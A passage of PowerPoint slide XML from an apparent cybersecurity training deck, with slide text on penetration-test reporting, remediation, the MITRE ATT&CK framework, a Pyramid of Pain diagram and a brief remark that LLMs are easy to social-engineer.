              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Even experts don’t fully understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> LLMs act this way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🤝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Too Much Trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>LLMs assume users are honest, making social engineering easy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000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7554F7F-0F7A-E7CB-5096-95EB589CE891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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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0952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23F0B9-1803-89F5-2FAC-0C1771D74B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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F328B4F-BB2A-2AFE-38EE-49B8678B811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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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74DFC4BA-73AC-0112-8070-21A7482BD7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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Penetration Test Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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D17EE9B-1849-5C2A-116D-BB2DEA11437C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="47766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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>📋 Document Everything</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Proof, steps, and screenshots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>⚠️ Risk ≠ Severity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Context turns flaws into risks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8FAFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>📉 Business Impact</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Fines, leaks, lost trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🔧 Actionable Fixes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Patch this | Train that | Monitor here.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>👔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
              <a:t> Executive Summary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="sv-SE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>No jargon—just risks &amp; ROI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.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3190E2E-52CA-1601-33D3-E4FB5BD9FC85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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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773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D10A74-7648-067B-81B4-E793BA7177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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E083B2-ADBD-ED48-3C48-841DF94D136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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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0F1EBB1A-75AA-07ED-BDDA-3B7EDC317C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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Final Stage: Remediation &amp; Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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F72B2B5-835D-104F-AE3D-AD1B5250F609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="46612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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>📝 Clear Documentation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Comprehensive record of vulnerabilities &amp; exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>⚠️ Contextual Risk &amp; Impact</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Detailed analysis of potential real-world consequences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🔨 Hands-On Support</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Direct help in applying recommended fixes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🔄 Ongoing Monitoring</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Strategies for continuous threat detection &amp; response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>📚 Reflect &amp; Improve</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Review lessons learned for better future tests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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0BC95D0-7301-7DA4-BBCD-9C85777388A3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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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657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5977900-ECB0-644F-9C4D-9603AEEF97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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2572793-11A2-0829-2872-CB437AE8345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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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3771157A-93B2-4C68-9122-8DF24B2C78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54198"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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MITRE ATT&amp;CK Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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FB5995A-1D34-900C-5621-A06BEC3B8FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67734" y="1183426"/>
            <a:ext cx="10195562" cy="54784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Inter"/>
              </a:rPr>
              <a:t>📚 Origin &amp; Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Mix of adversary tactics, techniques, and everyday attacker insights.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>🏢 Who’s Behind It</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Developed by MITRE, a non-profit funded</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>by the US Department of Homeland Security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>🎯 Main Purpose</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Detail the TTPs used by attackers to build</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>threat-informed defenses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>🛡 How It Helps</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Organize and categorize attack methods</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>to better defend your systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>🆓 Free &amp; Enterprise Options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Free resources available, plus enterprise services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>🔗 Microsoft Integration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>See it in action with Microsoft Sentinel and the MITRE matrix.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>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83A7CED-2D3C-BAF6-9A1F-93D62C41990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58869" y="1897478"/>
            <a:ext cx="7128577" cy="3588922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FA806B04-1FE9-18C7-54AF-4D0E758241E3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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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2276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2C1647-21E1-E747-6774-8189C7E4C7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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ECB806C-3DE6-D360-DC00-D2061758274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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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04AF286C-8731-9E7D-6367-1F14A57D6F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8" y="62973"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Pyramid of Pain</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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7" name="Freeform: Shape 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA35654B-9B41-0F5E-60A4-78BC1B7A36CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528040" y="1309918"/>
            <a:ext cx="882440" cy="814498"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 441220 w 882440"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 814498"/>
              <a:gd name="connsiteX1" fmla="*/ 882440 w 882440"/>
              <a:gd name="connsiteY1" fmla="*/ 814498 h 814498"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 882440"/>
              <a:gd name="connsiteY2" fmla="*/ 814498 h 814498"/>
              <a:gd name="connsiteX3" fmla="*/ 441220 w 882440"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 8144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82440" h="814498">
                <a:moveTo>
                  <a:pt x="441220" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="882440" y="814498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="814498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441220" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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N"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Freeform: Shape 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AA0E37-5488-B806-1B21-7D7F7A19D1AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064533" y="2170135"/>
            <a:ext cx="1809454" cy="809921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 438741 w 1809454"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX1" fmla="*/ 1370714 w 1809454"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX2" fmla="*/ 1809454 w 1809454"/>
              <a:gd name="connsiteY2" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1809454"/>
              <a:gd name="connsiteY3" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX4" fmla="*/ 438741 w 1809454"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8099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09454" h="809921">
                <a:moveTo>
                  <a:pt x="438741" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1370714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809454" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438741" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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N"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Freeform: Shape 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D9AA4D-4F25-265A-CF79-0DAD2954ABA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1601027" y="3025775"/>
            <a:ext cx="2736469" cy="809921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 438740 w 2736469"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX1" fmla="*/ 2297728 w 2736469"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX2" fmla="*/ 2736469 w 2736469"/>
              <a:gd name="connsiteY2" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2736469"/>
              <a:gd name="connsiteY3" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX4" fmla="*/ 438740 w 2736469"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8099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36469" h="809921">
                <a:moveTo>
                  <a:pt x="438740" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2297728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736469" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438740" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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N"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Freeform: Shape 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7147BE2-0580-6407-9ADA-9A10662B0074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137518" y="3881415"/>
